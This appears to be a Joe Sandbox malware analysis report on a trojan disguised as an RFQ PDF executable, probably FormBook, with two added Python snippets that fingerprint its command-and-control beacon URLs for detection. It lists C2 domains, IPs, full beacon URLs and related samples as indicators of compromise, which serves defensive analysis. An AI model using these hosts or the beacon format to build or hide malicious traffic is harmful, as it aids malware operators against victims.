http://www.pierresplayhouse.com/pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI0 | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation (×3) | safe
http://www.sandoll.co.kr | 0% | URL Reputation (×3) | safe
http://www.ssfgasia.com/pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI0 | 0% | Avira URL Cloud | safe
http://www.urwpp.deDPlease | 0% | URL Reputation (×3) | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation (×3) | safe
http://www.sakkal.com | 0% | URL Reputation (×3) | safe

Domains and IPs

Contacted Domains

The Antivirus Detection column was empty for every row and is omitted.

Name | IP | Active | Malicious | Reputation
luegomusic.com | 162.241.244.61 | true | true | unknown
ssfgasia.com | 34.102.136.180 | true | false | unknown
desertfoxindustries.com | 184.168.131.241 | true | true | unknown
www.rootedwithlovejax.com | 216.239.36.21 | true | false | unknown
td-balancer-euw2-6-109.wixdns.net | 35.246.6.109 | true | false | unknown
www.kf350.com | 107.178.142.156 | true | true | unknown
www.1364kensington.com | 66.96.161.160 | true | true | unknown
www.pierresplayhouse.com | 199.59.242.153 | true | true | unknown
tennesseewheelrepair.com | 184.168.131.241 | true | true | unknown
www.essentials-trading.com | unknown | unknown | true | unknown
www.coloradocouponclub.com | unknown | unknown | true | unknown
www.tennesseewheelrepair.com | unknown | unknown | true | unknown
www.quickeasybites.com | unknown | unknown | true | unknown
www.ssfgasia.com | unknown | unknown | true | unknown
www.hzmsbg.com | unknown | unknown | true | unknown
www.lideresdeimmunocal.com | unknown | unknown | true | unknown
www.desertfoxindustries.com | unknown | unknown | true | unknown
www.thecapitalhut.com | unknown | unknown | true | unknown
www.luegomusic.com | unknown | unknown | true | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.1364kensington.com/pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI0 | true | Avira URL Cloud: safe | unknown
http://www.thecapitalhut.com/pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0 | false | Avira URL Cloud: safe | unknown
http://www.desertfoxindustries.com/pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0 | true | Avira URL Cloud: safe | unknown
http://www.kf350.com/pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI0 | true | Avira URL Cloud: safe | unknown
http://www.tennesseewheelrepair.com/pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0 | true | Avira URL Cloud: safe | unknown
www.luegomusic.com/pe0r/ | true | Avira URL Cloud: safe | low
http://www.luegomusic.com/pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0 | true | Avira URL Cloud: safe | unknown
http://www.rootedwithlovejax.com/pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI0 | false | Avira URL Cloud: safe | unknown
http://www.pierresplayhouse.com/pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI0 | true | Avira URL Cloud: safe | unknown
http://www.ssfgasia.com/pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI0 | false | Avira URL Cloud: safe | unknown
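Every contacted URL above shares the path /pe0r/ and the query parameter names jfIla4 and Yn, with the Yn value fixed at ybIHhf989FGTI0 while the host and the jfIla4 value change from request to request. That shape, not the hostnames, is what a detection should key on: the per-host reputation verdicts are all "safe", and the domains are disposable. The following is an added example, not part of the Joe Sandbox report, that derives that fingerprint from the URLs in this report and then applies it to new URLs. The URL list is copied verbatim from the Contacted URLs table (including the one scheme-less entry as the report shows it); the www.example.invalid host in the demonstration is constructed.

```python
from collections import defaultdict
from urllib.parse import urlparse

# Copied from the Contacted URLs table of this report (malicious flags stripped).
CONTACTED_URLS = [
    "http://www.1364kensington.com/pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI0",
    "http://www.thecapitalhut.com/pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0",
    "http://www.desertfoxindustries.com/pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0",
    "http://www.kf350.com/pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI0",
    "http://www.tennesseewheelrepair.com/pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0",
    "www.luegomusic.com/pe0r/",
    "http://www.luegomusic.com/pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0",
    "http://www.rootedwithlovejax.com/pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI0",
    "http://www.pierresplayhouse.com/pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI0",
    "http://www.ssfgasia.com/pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI0",
]


def split_url(url):
    """Return (host, path, [(name, raw_value), ...]). Values are deliberately not
    percent-decoded so '+' and '/' inside the base64-like payload survive intact.
    A scheme-less entry (as the report lists one) is treated as http://."""
    p = urlparse(url if "://" in url else "http://" + url)
    params = []
    for part in (p.query.split("&") if p.query else []):
        name, _, value = part.partition("=")
        params.append((name, value))
    return p.hostname, p.path, params


def c2_fingerprint(urls, min_hosts=3):
    """Find the path shared by the most distinct hosts and describe its query shape:
    which parameter names always appear, and which of them never change value."""
    by_path = defaultdict(list)
    for u in urls:
        host, path, params = split_url(u)
        by_path[path].append((host, params))
    best = None
    for path, entries in by_path.items():
        hosts = sorted({h for h, _ in entries if h})
        if len(hosts) < min_hosts:
            continue
        queried = [dict(p) for _, p in entries if p]
        names = set.intersection(*(set(q) for q in queried)) if queried else set()
        constant = {n: queried[0][n] for n in names if len({q[n] for q in queried}) == 1}
        cand = {"path": path, "hosts": hosts, "param_names": sorted(names),
                "constant_params": constant, "variable_params": sorted(names - set(constant))}
        if best is None or len(hosts) > len(best["hosts"]):
            best = cand
    return best


def matches_fingerprint(url, fp):
    """Hunting rule: same path, exactly the same parameter names, and every constant
    parameter at its known value. The host is ignored on purpose because it rotates."""
    _, path, params = split_url(url)
    if path != fp["path"] or not params:
        return False
    q = dict(params)
    if set(q) != set(fp["param_names"]):
        return False
    return all(q[n] == v for n, v in fp["constant_params"].items())


if __name__ == "__main__":
    fp = c2_fingerprint(CONTACTED_URLS)
    print(fp["path"], fp["param_names"], fp["constant_params"], len(fp["hosts"]), "hosts")
    # Constructed host, not from the report: would a fresh C2 domain still match?
    print(matches_fingerprint("http://www.example.invalid/pe0r/?jfIla4=AAAA&Yn=ybIHhf989FGTI0", fp))
```

The bare www.luegomusic.com/pe0r/ entry is handled as an edge case rather than dropped: it contributes its host to the cluster but, having no query, is excluded from the parameter analysis so it cannot erase the parameter set. A proxy or IDS rule written from the result would match on the URI path and the two parameter names plus the fixed Yn value, which survives the domain rotation that defeats the per-host "safe" verdicts above.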

URLs from Memory and Binaries

Rows marked "(×3)" carried three identical URL Reputation verdicts in the original table and are collapsed here.

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | | high
https://lh5.googleusercontent.com/tnT1qBMzmyLgRDNYg3gq78quEpuZVERk849E090SPkl3uZ90NtOdF0DdK28eDthwrR | control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp | false | | high
http://www.goodfont.co.kr | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
https://rootedwithlovejax.com | control.exe, 00000007.00000002.911224568.0000000004E22000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
http://www.sajatypeworks.com | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
http://www.typography.netD | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
http://fontfabrik.com | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
http://www.fontbureau.com/designers/frere-user.html | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.%s.comPA | explorer.exe, 00000005.00000000.660312730.0000000002B50000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | low
http://www.fonts.com | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
http://www.sakkal.com | explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown

                                                                      Contacted IPs

                                                                      Public

IP              | Domain                            | Country       | ASN    | ASN name                    | Malicious
199.59.242.153  | www.pierresplayhouse.com          | United States | 395082 | BODIS-NJUS                  | true
35.246.6.109    | td-balancer-euw2-6-109.wixdns.net | United States | 15169  | GOOGLEUS                    | false
66.96.161.160   | www.1364kensington.com            | United States | 29873  | BIZLAND-SDUS                | true
216.239.36.21   | www.rootedwithlovejax.com         | United States | 15169  | GOOGLEUS                    | false
107.178.142.156 | www.kf350.com                     | United States | 8100   | ASN-QUADRANET-GLOBALUS      | true
162.241.244.61  | luegomusic.com                    | United States | 46606  | UNIFIEDLAYER-AS-1US         | true
34.102.136.180  | ssfgasia.com                      | United States | 15169  | GOOGLEUS                    | false
184.168.131.241 | desertfoxindustries.com           | United States | 26496  | AS-26496-GO-DADDY-COM-LLCUS | true

                                                                      General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 383968
Start date: 08.04.2021
Start time: 13:20:33
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 12s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: RFQ_AP65425652_032421 isu-isu,pdf.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/3@17/8
EGA Information: Failed
HDC Information:
• Successful, ratio: 63.2% (good quality ratio 58.2%)
• Quality average: 74.2%
• Quality standard deviation: 30.5%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 88
• Number of non-executed functions: 60
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Excluded processes from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 23.54.113.53, 104.43.139.144, 52.147.198.201, 168.61.161.212, 52.255.188.83, 20.82.210.154, 23.10.249.26, 23.10.249.43, 93.184.221.240, 52.155.217.156, 20.54.26.129
• Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      No simulations

                                                                      Joe Sandbox View / Context

                                                                      IPs

Match | Associated sample name / URL | Detection | Context

199.59.242.153
• LWlcpDjYIQ.exe, malicious: www.simplyhealrhcareplans.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK
• RCS76393.exe, malicious: www.addthat.xyz/goei/?EzuXh6BP=WHzdRAWCNmljEZUdYknMeV5zI3m+uLt35kXWxc+UN/aPGTi9DTFvtLFMQ5OC8xESdqE/mkifJw==&RL0=rVvxj02xpd_lyz
• PaymentAdvice.exe, malicious: www.sgdivergence.com/c22b/?GPi8=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ71wwJK0guSYZ&ary=tXLpzhFpgBj4m
• 0BAdCQQVtP.exe, malicious: www.mybodtonheart.com/bei3/?8p=EZa0cv&2d=yiVLv/mU1trn0FqDcpsMmhM8eVaNKk/wrW0n1zaKB+0dUktd9YtDHn8fCzOxundmeb0pk/R87Q==
• RFQ_ V-21-Kiel-050-D02.xlsx, malicious: www.krishnagiri.info/nsag/?MDK0g=hPHybZPWty89zdC7zz6D1Y5bPXZXETq0TT3iYhuvTaEiGqMWh7BB5kcULROPrIgmxQ/f1w==&UB=hR-4brtxaT5D4f3
• New Order.exe, malicious: www.friendsed.com/ditf/?KvZpwPd=7CjyIVchQZXwoSp1jc0tC17NVLbOMlIdjZlIPcHCPGe34LEeqGe9fWkqZA8O62TU4Lu3&ARn=BjAtCdjxOrQ8pTgP
• ALPHA SCIENCE, INC.exe, malicious: www.simplyhealrhcareplans.com/sqra/?Rl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK&_jqT2L=gBg8BF3ptlc
• payment.exe, malicious: www.mybodtonheart.com/bei3/?M4YDYvh=yiVLv/mU1trn0FqDcpsMmhM8eVaNKk/wrW0n1zaKB+0dUktd9YtDHn8fCzCIiGxmJdo4&Rl=M48tiJch
• Order.exe, malicious: www.getbacklink.net/cugi/?BlL=15D5Rlw69THVEJtjRVEnjixvCWz0IM/dTd5neGnMhVDDO36KfpjGt1+SA4NLCUy6JvG/&EZXpx6=tXExBh8PdJwpH
• PaymentInvoice.exe, malicious: www.sgdivergence.com/c22b/?9rgH70GX=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ72QgGrkYw3xe&LL0=X4XDHNl0z
• SB210330034.pdf.exe, malicious: www.tollisenschool.com/g7b/?8p=chLXzryXh&tL30J=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqljBtE+arhNut
• swift_76567643.exe, malicious: www.hicapitolize.com/m8es/?CVJ=sG6ecfng0YvqxX6BTfb7C0qDagoY2GDrv6xqwretuMrKP6q0Q4gvq6Z0725wPxuv0KtT&oX9=Txo8ntB0WBsp
• Request an Estimate_2021_04_01.exe, malicious: www.tollisenschool.com/g7b/?RzulnV=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqljBHbOqrlPmt&QL3=tTypTNm0gPD0F
• 2021-04-01.exe, malicious: www.tollisenschool.com/g7b/?o2=iL30VlAxs&8pntMJ6P=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqlghXUv6T7qPq
• onbgX3WswF.exe, malicious: www.sgdivergence.com/c22b/?w6=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ72QgGrkYw3xe&1b=W6O4DXSP5
• ARBmDNJS7m.exe, malicious: www.bootstrapexpress.com/aqu2/?rPj0Qr6=nYriP3GcRBwukkcsj3Cw6qOI4UbADI9fnlgfdFCApi4mXX+dpAaC8djN6XYIns7fxRpg&tXrx=gdkpfvSpm
• Bista_094924,ppdf.exe, malicious: www.simplyhealrhcareplans.com/sqra/?EBZ=ZTIti4FxbnDxH&YVMp8pfx=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK
• PO.1183.exe, malicious: www.dentalenhancments.com/god/?XDKPxrlh=EnxYEfX2deexTb058Y7c97BLkeqRbsEiixp341UOoiLWyojMB+48BbQ1WdyM7J0osU9+&anM=LjfLu4hPXh18f
• Scan-45679.exe, malicious: www.wwwrigalinks.com/gwam/?Bjq=CXJcwEGd359wd7S74zzuJNqJGNLbtnXn+r8vDW7RCwie8OTRcmbQ6IgfXutP9/RkpDpW&Efzxz2=2dut_L3xNbOxThN
• TT Remittance Copy.PDF.exe, malicious: www.creditcorecard.com/ihmh/?wP9=1bJfls8sWvOO1f7Vh8wqJhCF9whiFTpEYoud4iYCKocbr8IRO//r9FkTIR4//YxGu1lm&lZQ=7nbLunBhP
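Every context URL in the list above has the same shape: a host, a single path segment of two to four alphanumerics, and exactly two query parameters, one holding a short token and the other a long base64-looking blob. The following triage helper is an added example written for this page (it is not Joe Sandbox's logic and not FormBook's own code): it encodes that shape as a heuristic and groups matching URLs by host so the hosts can go straight to a blocklist. The regexes, the 40/24 length cut-offs and the two benign URLs are assumptions; the four sample URLs are copied from the table above. Note that the parser splits the query by hand, because `urllib.parse.parse_qsl` would decode the literal `+` inside the blob into a space and change the value length.

```python
import re
from urllib.parse import urlsplit

# Beacon shape (heuristic assumed for this example, derived from the context table):
#   www.<domain>/<2-4 alphanumerics>/?<key>=<long base64-like blob>&<key>=<short token>
PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,4}/$")
KEY_RE = re.compile(r"^[A-Za-z0-9_]{1,12}$")
VALUE_RE = re.compile(r"^[A-Za-z0-9+/=_-]+$")
LONG_MIN, SHORT_MAX = 40, 24   # length cut-offs chosen from the table above; assumptions


def split_query(query):
    """Split k=v pairs without percent- or plus-decoding: the '+' and '/' inside the
    blob are literal, and parse_qsl would turn '+' into a space."""
    pairs = []
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def _with_scheme(url):
    """The report lists URLs without a scheme; urlsplit needs one to find the host."""
    return url if "://" in url else "http://" + url


def looks_like_formbook_beacon(url):
    """True when the URL has the path and query shape of the context entries above."""
    parts = urlsplit(_with_scheme(url))
    if not PATH_RE.match(parts.path):
        return False
    pairs = split_query(parts.query)
    if len(pairs) != 2:
        return False
    if not all(KEY_RE.match(k) and VALUE_RE.match(v) for k, v in pairs):
        return False
    short, long_ = sorted(len(v) for _, v in pairs)
    return short <= SHORT_MAX and long_ >= LONG_MIN


def c2_domains(urls):
    """Group matching URLs by host; the host list is what goes on a blocklist."""
    hits = {}
    for u in urls:
        if looks_like_formbook_beacon(u):
            hits.setdefault(urlsplit(_with_scheme(u)).hostname, []).append(u)
    return hits


# Four context URLs copied from the table above.
SAMPLE_URLS = [
    "www.simplyhealrhcareplans.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK",
    "www.addthat.xyz/goei/?EzuXh6BP=WHzdRAWCNmljEZUdYknMeV5zI3m+uLt35kXWxc+UN/aPGTi9DTFvtLFMQ5OC8xESdqE/mkifJw==&RL0=rVvxj02xpd_lyz",
    "www.tollisenschool.com/g7b/?8p=chLXzryXh&tL30J=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqljBtE+arhNut",
    "www.krishnagiri.info/nsag/?MDK0g=hPHybZPWty89zdC7zz6D1Y5bPXZXETq0TT3iYhuvTaEiGqMWh7BB5kcULROPrIgmxQ/f1w==&UB=hR-4brtxaT5D4f3",
]
# Constructed benign URLs (not from the report) that must not match.
BENIGN_URLS = [
    "https://www.example.com/search?q=invoice&page=2",      # path is not a 2-4 char segment
    "https://www.example.com/abcd/?session=" + "A" * 64,    # only one query parameter
]

if __name__ == "__main__":
    for host, urls in c2_domains(SAMPLE_URLS + BENIGN_URLS).items():
        print(host, len(urls))
```

This is a triage heuristic, not a signature: a short random path plus one long opaque parameter also occurs in legitimate tracking links, so matches should be confirmed against the process that issued the request (here a hollowed system process) before blocking.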

                                                                      Domains

Match | Associated sample name / URL | Detection | Context

www.1364kensington.com
• RFQ_AP65425652_032421 v#U00e1#U00ba#U00a5n #U00c4#U2018#U00e1#U00bb ,pdf.exe, malicious: 66.96.161.160

                                                                      ASN

Match | Associated sample name / URL | Detection | Context

BODIS-NJUS
• LWlcpDjYIQ.exe, malicious: 199.59.242.153
• RCS76393.exe, malicious: 199.59.242.153
• PaymentAdvice.exe, malicious: 199.59.242.153
• 0BAdCQQVtP.exe, malicious: 199.59.242.153
• RFQ_ V-21-Kiel-050-D02.xlsx, malicious: 199.59.242.153
• New Order.exe, malicious: 199.59.242.153
• ALPHA SCIENCE, INC.exe, malicious: 199.59.242.153
• payment.exe, malicious: 199.59.242.153
• Order.exe, malicious: 199.59.242.153
• PaymentInvoice.exe, malicious: 199.59.242.153
• SB210330034.pdf.exe, malicious: 199.59.242.153
• swift_76567643.exe, malicious: 199.59.242.153
• Request an Estimate_2021_04_01.exe, malicious: 199.59.242.153
• 2021-04-01.exe, malicious: 199.59.242.153
• onbgX3WswF.exe, malicious: 199.59.242.153
• ARBmDNJS7m.exe, malicious: 199.59.242.153
• Bista_094924,ppdf.exe, malicious: 199.59.242.153
• PO.1183.exe, malicious: 199.59.242.153
• Scan-45679.exe, malicious: 199.59.242.153
• TT Remittance Copy.PDF.exe, malicious: 199.59.242.153

BIZLAND-SDUS
• PaymentAdvice.exe, malicious: 66.96.162.131
• Calt7BoW2a.exe, malicious: 66.96.162.128
• 46578-TR.exe, malicious: 66.96.162.136
• RFQ_AP65425652_032421 v#U00e1#U00ba#U00a5n #U00c4#U2018#U00e1#U00bb ,pdf.exe, malicious: 66.96.161.160
• PO91361.exe, malicious: 66.96.162.129
• 56_012021.doc, malicious: 66.96.149.32
• RFQ-V-SAM-0321D056-DOC.exe, malicious: 207.148.248.143
• W88AZXFGH.exe, malicious: 66.96.162.131
• Purchase Orders.exe, malicious: 65.254.248.81
• 02B56iRnVM.exe, malicious: 209.59.219.1
• Swift 76498,pdf.exe, malicious: 66.96.134.26
• new built.exe, malicious: 66.96.162.131
• BL Draft copy.exe, malicious: 66.96.162.128
• PaymentInvoice.exe, malicious: 66.96.162.131
• SHIPPING DOCUMENTS.exe, malicious: 66.96.162.131
• bank details.exe, malicious: 65.254.248.81
• Payment_png.exe, malicious: 66.96.160.133
• salescontractv2draft.exe, malicious: 66.96.162.149
• orders.exe, malicious: 65.254.248.81
• Order-PO-0186500.exe, malicious: 207.148.248.143

ASN-QUADRANET-GLOBALUS
• Payment Slip.exe, malicious: 192.161.187.200
• ORDER343346PO3455.exe, malicious: 172.93.187.249
• PO987633ORDER443REQUEST.exe, malicious: 172.93.187.249
• ORDER93949394.exe, malicious: 172.93.187.249
• ORDER34543REQUEST34444PO.exe, malicious: 172.93.187.249
• ORDER34543REQUEST34444PO343.exe, malicious: 172.93.187.249
• ORDER03094838493.exe, malicious: 172.93.187.249
• ORDER0039484#PO.exe, malicious: 172.93.187.249
• PO#ORDER937743.exe, malicious: 172.93.187.249
• ORDER33439484#PO.exe, malicious: 172.93.187.249
• SWIFTCOPY_110255293303484_SANTANDER.doc, malicious: 185.174.101.41
• SbdCFa6pNA, malicious: 173.254.217.214
• approved new order_April TT181.doc, malicious: 185.174.101.41
• OC CVE9362 _TVOP-MIO 24.doc, malicious: 185.174.101.41
• n74DqoAGos.exe, malicious: 173.44.50.137
• r74BL8gyil.exe, malicious: 173.44.50.137
• 89OdCS5Qeu.exe, malicious: 161.129.66.224
• tcYgoJHJSg, malicious: 173.254.217.214
• vdaiygLkjH, malicious: 173.254.217.214
• 4i1GUIgglX.exe, malicious: 192.161.48.5

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

C:\Users\user\AppData\Local\Temp\7di05goozxs8
Process: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe
File Type: data
Category: dropped
Size (bytes): 164864
Entropy (8bit): 7.998854864246748
Encrypted: true
SSDEEP: 3072:d44peOnn7lgGgQgnGV5PLwDXnhgPKCUbRn0Ga7TY6EcH5w+lETIF7:DQOnn7UGV5wD3hbCQ0Ga7BjHVLF7
MD5: D7088EEF0E87F0C50D1AD0DFB884F8DA
